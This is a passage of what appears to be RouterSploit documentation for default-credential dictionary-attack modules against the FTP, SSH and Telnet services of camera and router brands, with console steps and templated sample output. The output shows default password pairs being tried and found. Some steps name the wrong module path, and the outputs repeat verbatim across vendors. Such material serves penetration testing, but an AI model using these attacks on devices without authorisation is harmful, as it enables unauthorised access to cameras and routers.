[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Samsung Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/samsung/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/samsung/ftp_default_creds
rsf (Samsung Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Samsung Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Samsung Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/samsung/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/samsung/ssh_default_creds
rsf (Samsung Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Samsung Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Samsung Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/samsung/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/samsung/telnet_default_creds
rsf (Samsung Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Samsung Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Sentry360 Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/sentry360/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/sentry360/ftp_default_creds
rsf (Sentry360 Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Sentry360 Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Sentry360 Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/sentry360/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/sentry360/ssh_default_creds
rsf (Sentry360 Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Sentry360 Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Sentry360 Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/sentry360/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/sentry360/telnet_default_creds
rsf (Sentry360 Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Sentry360 Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Siemens Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/siemens/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/siemens/ftp_default_creds
rsf (Siemens Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Siemens Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Siemens Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/siemens/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/siemens/ssh_default_creds
rsf (Siemens Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Siemens Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Siemens Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/siemens/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/siemens/telnet_default_creds
rsf (Siemens Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Siemens Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Speco Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/speco/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/speco/ftp_default_creds
rsf (Speco Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Speco Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Speco Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/speco/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/speco/ssh_default_creds
rsf (Speco Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Speco Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Speco Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/speco/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/speco/telnet_default_creds
rsf (Speco Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Speco Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Stardot Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/stardot/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/stardot/ftp_default_creds
rsf (Stardot Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Stardot Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Stardot Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/stardot/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/stardot/ssh_default_creds
rsf (Stardot Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Stardot Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Stardot Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/stardot/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/stardot/telnet_default_creds
rsf (Stardot Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Stardot Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Vacron Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/vacron/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/vacron/ftp_default_creds
rsf (Vacron Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Vacron Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Vacron Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/vacron/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/vacron/ssh_default_creds
rsf (Vacron Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Vacron Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Vacron Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/vacron/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/vacron/telnet_default_creds
rsf (Vacron Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Vacron Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against VideoIQ Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/videoiq/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/videoiq/ftp_default_creds
rsf (VideoIQ Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (VideoIQ Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against VideoIQ Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/videoiq/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/videoiq/ssh_default_creds
rsf (VideoIQ Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (VideoIQ Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against VideoIQ Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/videoiq/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/videoiq/telnet_default_creds
rsf (VideoIQ Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (VideoIQ Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Asmax Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asmax/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asmax/ftp_default_creds
rsf (Asmax Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asmax Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Asmax Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asmax/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asmax/ssh_default_creds
rsf (Asmax Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asmax Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Asmax Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asmax/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asmax/telnet_default_creds
rsf (Asmax Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asmax Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Asus Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asus/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asus/ftp_default_creds
rsf (Asus Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asus Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Asus Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asus/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asus/ssh_default_creds
rsf (Asus Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asus Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Asus Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/asus/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/asus/telnet_default_creds
rsf (Asus Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Asus Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Belkin Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/belkin/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
